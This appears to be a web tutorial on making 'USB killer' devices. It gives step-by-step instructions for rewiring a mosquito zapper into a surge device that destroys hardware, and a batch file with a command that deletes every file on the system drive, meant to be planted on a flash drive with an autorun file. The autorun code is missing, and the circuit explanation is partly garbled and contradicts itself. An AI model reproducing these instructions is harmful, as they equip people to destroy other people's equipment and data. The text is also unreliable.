A USB killer is a malicious device designed to physically damage or destroy electronic devices that have USB ports. It works by delivering a high-voltage surge through a USB port, effectively frying the internal components of the connected device. This surge typically comes from capacitors that rapidly charge and discharge the voltage, which can be lethal to unprotected hardware.
Table of Contents

The circuit of a USB killer typically includes:
Certainly! Let’s break down each component and its function step by step:
1. Capacitors: Capacitors are electronic components that store electrical energy temporarily in an electric field. They consist of two conductive plates separated by an insulating material (dielectric). When a voltage is applied across the plates, one plate accumulates a positive charge while the other accumulates an equal negative charge. This stored electrical energy can be discharged rapidly when needed.
2. Voltage multiplier: A voltage multiplier is a circuit designed to increase the voltage level from a lower value to a higher one. One common design is the Cockcroft-Walton multiplier circuit. It uses a combination of capacitors and diodes arranged in a ladder-like configuration. When an alternating current (AC) voltage is inputted, the capacitors charge and discharge through the diodes, effectively doubling (or multiplying) the voltage level. This process repeats across multiple stages, each adding to the overall voltage. The output voltage can be significantly higher than the input, making it useful for generating high voltages needed for various applications.
3. Switching mechanism: The switching mechanism controls the discharge of stored energy (from capacitors or a voltage multiplier) into the USB port or any other target device. It typically consists of a transistor or a solid-state relay (SSR) that can handle the high voltage and current involved. Here’s how it works step by step:
- Charge Accumulation: Capacitors or the voltage multiplier circuit accumulates electrical energy from the power source.
- Triggering the Switch: When it’s time to discharge the stored energy (for example, to power a USB device), the switching mechanism is activated.
- Discharge Control: The switching mechanism rapidly connects the charged capacitors or voltage multiplier circuit to the USB port. This allows the stored energy to flow into the device, providing the necessary power.
- Safety Considerations: Since the discharge can involve high voltage levels (especially in voltage multiplier circuits), proper safety measures such as insulation, grounding, and component ratings are crucial to prevent damage to the USB port or the connected device.
How to make a usb killer – Methodology
Metho- 1: Hardware-based USB Killer
You’ll need the following components:
- Mosquito Zapper (available on Amazon or eBay)
- USB Case (from an old/trash USB flash drive)
- Male USB jack (available on Amazon or eBay)
- Female USB jack (available on Amazon or eBay)
Here’s the circuiting process:
- Open the Mosquito Zapper case and remove the circuit.
- Remove the discharging capacitor at the output of the circuit.
- Solder the USB female jack in place of the removed capacitor.
- Solder the USB male jack to the capacitor removed and place it in the USB case.
- Apply electric tape for more safety.
- Charge the USB killer by inserting it into the female USB jack of the Zapper circuit.
Method-2: Software-based USB Killer (Data Destroyer)
This method will damage the data on the hard disk. You’ll need:
- A notepad or text editor
- A flash drive with any free size
Here’s the process:
- Open the notepad and input the following code:
@echo off
del /q /f /s %systemdrive%\*
Save it as “USBKiller.bat”.
- Open the notepad again and input the following code:
Save it as “AutoRun.inf”.
- Place both files (“AutoRun.inf” and “USBKiller.bat”) into the flash drive.
This software-based USB killer will delete all files on the system drive when inserted into a computer.
“Again, please use these methods at your own risk, as they can cause damage to devices and data.“